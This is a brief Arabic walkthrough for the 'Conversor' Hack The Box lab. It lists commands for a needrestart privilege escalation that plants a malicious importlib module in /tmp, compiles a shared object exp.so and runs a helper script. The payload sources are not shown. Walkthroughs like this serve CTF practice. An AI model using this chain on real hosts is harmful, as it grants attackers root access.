
لقد جربت هذا في آلة Conversor HTB
مرحبًا، هذا هو 0x3bs
في الجهاز الضحية:
set -e
cd /tmp
# 1. Create the malicious module directory structure
mkdir -p malicious/importlib
في جهاز المهاجم
لتجميع lib.c في جهاز المهاجم:
gcc -shared -fPIC -o exp.so lib.c
وفي الجهاز الضحية:
في /tmp
chmod +x run.sh
في /tmp/malicious/importlib:
chmod +x exp.so
./exp.so
# try to run it after run 'run.sh' if it didn't work
وفي /tmp
./run.sh
وفي جلسة أخرى قم بتشغيل needrestart
تذكر >> يجب أن يكون exp.so في /tmp/malicious/importlib